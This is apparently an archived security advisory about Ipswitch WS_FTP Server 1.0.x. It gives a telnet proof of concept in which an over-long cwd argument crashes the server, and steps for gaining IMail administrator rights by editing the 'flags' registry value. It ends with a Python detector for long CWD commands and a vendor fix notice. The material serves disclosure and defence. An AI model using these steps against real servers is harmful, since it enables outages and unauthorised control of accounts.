COMMAND

    WS_FTP Server

SYSTEMS AFFECTED

    WS_FTP Server Version 1.0.1.E/1.0.2.E

PROBLEM

    The following is based on an eEye Digital Security Team advisory.
    While running Retina against more server applications, eEye found
    that WS_FTP Server stopped responding to their scans.  The
    following are their findings.  WS_FTP Server cannot handle a cwd
    command with a string longer than 876 characters appended to it.

        telnet server.com 21
        220-SERV X2 WS_FTP Server 1.0.2.EVAL (728964122)
        220-Sat Jan 30 15:25:10 1999
        220-30 days remaining on evaluation.
        220 SERV X2 WS_FTP Server 1.0.2.EVAL (728964122)
        user ftp
        331 Password required
        pass ftp
        230 user logged in
        cwd AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAA
        Connection to host lost.

    The iFtpSvc.exe (Server Exe) process has now exited and therefore
    the WS_FTP Server will no longer respond.  No error is displayed
    on screen, nor is anything written to the event log.  The smallest
    number of characters needed is 876.  So sending "cwd b" where the
    length of b is greater than 875 will crash the remote server.

    Also, WS_FTP Server and IMail do not store user database
    information "securely."  Some might think the following is not a
    hole nor a problem (depends on how much security matters).  WS_FTP
    Server and IMail both store user information in the registry
    insecurely, making it easy to mount a local attack in which any
    user can gain IMail / WS_FTP Server administrator permissions.
    Each user profile is stored in the following key.

        HKEY_LOCAL_MACHINE\SOFTWARE\Ipswitch\IMail\Domains\HASTE\Users\Marc

    Where Marc is the name of the user account and HASTE is the name
    of the machine.  The security permissions on the key are:

        Query Value
        Set Value
        Create Subkey
        Enumerate Subkeys
        Notify
        Delete
        Read Control

    There is a section in the key called "flags."  This is the section
    that holds the rights of the user.  When it is set to "1920" you
    will have Administrator Access to IMail.  So to sum it all up, we
    do the following: we change flags to equal 1920 and then use the
    IMail Web Administration Interface to do anything to any IMail
    user, i.e. create accounts, delete accounts, etc.  This is a local
    attack.
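
    For the over-long cwd argument described earlier in this section,
    the following is an added detection example, not code from the
    advisory or from Ipswitch.  It reassembles a client-to-server FTP
    control stream and flags cwd arguments of 876 characters or more;
    the class name, the MAX_LINE cap and the sample segments are
    assumptions constructed for illustration.

```python
CRASH_LEN = 876   # smallest crashing argument length, per the advisory
MAX_LINE = 8192   # assumption: cap on buffered bytes for one connection


class FtpCommandInspector:
    """Reassembles one client->server FTP control stream into commands."""

    def __init__(self, limit=CRASH_LEN):
        self.limit = limit
        self.buf = b""
        self.alerts = []

    def feed(self, segment: bytes):
        """Accept one TCP payload; a command may span several payloads."""
        self.buf += segment
        while True:
            nl = self.buf.find(b"\n")
            if nl < 0:
                break
            line, self.buf = self.buf[:nl].rstrip(b"\r"), self.buf[nl + 1:]
            self._check(line)
        # A line that never terminates is suspicious in itself; flag it
        # and drop the buffer so the inspector's memory stays bounded.
        if len(self.buf) > MAX_LINE:
            self.alerts.append(("UNTERMINATED", len(self.buf)))
            self.buf = b""
        return self.alerts

    def _check(self, line: bytes):
        verb, _, arg = line.partition(b" ")
        # FTP verbs are case-insensitive; the advisory's session used "cwd".
        if verb.upper() == b"CWD" and len(arg) >= self.limit:
            self.alerts.append(("CWD", len(arg)))


def demo():
    # Constructed capture: the long command is split across three segments,
    # so inspecting each packet on its own would miss it.
    segments = [b"user ftp\r\npass ftp\r\ncw", b"d " + b"A" * 500,
                b"A" * 376 + b"\r\ncwd /pub\r\n"]
    insp = FtpCommandInspector()
    for seg in segments:
        insp.feed(seg)
    return insp.alerts


if __name__ == "__main__":
    print(demo())
```
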

SOLUTION

    The problem above is corrected and the first update of the WS_FTP
    Server has been in testing for around three weeks.  All registered
    users of WS_FTP Server will be automatically notified when this is
    released and will be able to update for free.